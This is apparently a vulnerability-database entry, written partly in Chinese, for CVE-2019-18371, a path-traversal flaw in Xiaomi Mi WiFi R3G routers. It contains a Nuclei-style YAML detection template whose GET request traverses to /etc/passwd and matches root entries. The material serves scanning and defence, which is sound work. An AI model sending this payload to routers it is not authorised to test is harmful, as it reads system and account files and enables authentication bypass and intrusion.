CVE-2019-18371: Xiaomi Mi WiFi R3G Routers - Local file Inclusion

日期: 2025-08-01 | 影响软件: Xiaomi Mi WiFi R3G Routers | POC: 已公开

漏洞描述

Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.

PoC代码[已公开]

id: CVE-2019-18371

info:
  name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion
  author: ritikchaddha
  severity: high
  description: |
    Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
  remediation: |
    Update the firmware of the Xiaomi Mi WiFi R3G routers to the latest version, which includes a fix for the local file inclusion vulnerability.
  reference:
    - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html
    - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18371
    - https://github.com/password520/Penetration_PoC
    - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-18371
    cwe-id: CWE-22
    epss-score: 0.90631
    epss-percentile: 0.99597
    cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mi
    product: millet_router_3g_firmware
  tags: cve2019,cve,lfi,router,mi,xiaomi

http:
  - method: GET
    path:
      - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cbe552d7cc647cc17f1b31b2f108b63ab9b739066ed285f54403d7bfaba33cc302205ddd448a0cbe736b0b3629b4e0310e7285b9e6d380370295e5645fccfd1e081e:922c64590222798bb761d5b6d8e72950